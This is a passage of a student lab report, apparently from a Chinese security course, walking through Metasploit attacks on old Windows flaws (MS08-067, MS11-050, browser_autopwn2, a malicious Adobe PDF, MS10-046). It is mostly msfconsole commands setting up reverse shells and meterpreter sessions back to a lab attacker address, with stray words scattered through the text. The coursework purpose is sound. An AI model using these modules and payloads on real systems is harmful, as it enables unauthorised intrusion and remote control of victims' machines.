Exp5:MSF基础应用

Exp5:MSF基础应用

1、基础问题回答

(1)用本身的话解释什么是 exploit , payload , encode.html

exploit: 设至关于利用漏洞偷偷打开的管道,将作好的木马病毒等顺利传输到靶机。

payload: 简单来讲就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,而后经过管道传输进去后开始为咱们控制靶机服务。

encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,可是不改变payload为咱们所用的特征,但能对payload进行加工。
shell

2、实践过程

  • 1.Windows服务渗透攻击——MS08-067安全漏洞
    • 在攻击机kali输入msfconsole进入控制台,依次输入如下指令:windows

      msf > use exploit/windows/smb/ms08_067_netapi

      msf exploit(ms08_067_netapi) > show payloads

      msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

      msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip

      msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口

      msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定

      msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

      msf exploit(ms08_067_netapi) > exploit //攻击

    • 此时须要关闭靶机的防火墙,否则会出现ConnectionTimeOut的失败;
      api

    • 攻击成功后的结果:
      浏览器

  • 2.浏览器渗透攻击——MS11-050安全

    • 在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload
    windows/meterpreter/reverse_http //http反向回连

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置

    msf exploit(ms11_050_cobjectelement) > exploit

  • 测试没法成功,老是会出现IE浏览器的错误,我以为问题是出在浏览器版本不对,不适合那个漏洞,既然如此,那就换个漏洞呗,下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
    • ** 实施browser_autopwn模块 **
      • 如今攻击机里进入msfconsole,而后分别输入

        use auxiliary/server/browser_autopwn2

        set SRVHOST 192.168.43.161

        set URIPATH auto

        show options

        服务器

      • 开始攻击,此时能够看到msf在不停的尝试不一样的payload
      • 尝试成功,输出了可被访问的URL http://192.168.43.161:8080/auto并启动服务器;
        session

      • 在靶机浏览器上输入URL后,浏览器跳转到 http://192.168.43.161:8080/auto/FaOGsp
        tcp

      • 回头看一下kali机,发现回连成功了,输入session -i 2获取对话,此时,已经得到了靶机的控制权。
        测试

  • 3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

    • 在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回连

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字

    msf exploit(adobe_cooltype_sing) > exploit //攻击
    • 将生成的pdf文件拷贝到靶机上。

    • 在kali上输入back退出当前模块,进入监听模块,输入如下命令:

    msf > use exploit/multi/handler //进入监听模块

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向链接

    msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(handler) > set LPORT 5213 //攻击端口固定

    msf exploit(handler) > exploit

    • 在靶机上打开5213lzm.pdf文件:
    • 攻击机显示攻击成功:
  • 4.快捷方式图标漏洞——MS10-046
    • 在攻击机kali输入msfconsole进入控制台,依次输入如下指令:

      msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

      msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连

      msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击

      • 此时弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
      • 对于已创建好了会话,经过命令sessions查看,并选择sessions -i 1,得到靶机控制权。

        (PS)本次试验时间上跨度有点大,没能连贯的作完,第四个项任务是在ciscn结束以后作的,而此时的kali机已被折腾崩了,因此考了别人的虚拟机,继续作完了,这里的IP不是以前那个。

3、实践总结及体会

本次试验给我最深的感触就是msf的强大,活用msf真的可以在渗透测试或者以攻击为目的的行为给予很大帮助,同时,为了防止被攻击,仍是及时更新系统,填补漏洞,由于有一双研眼镜正在窥探你的笔记本。

相关文章
相关标签/搜索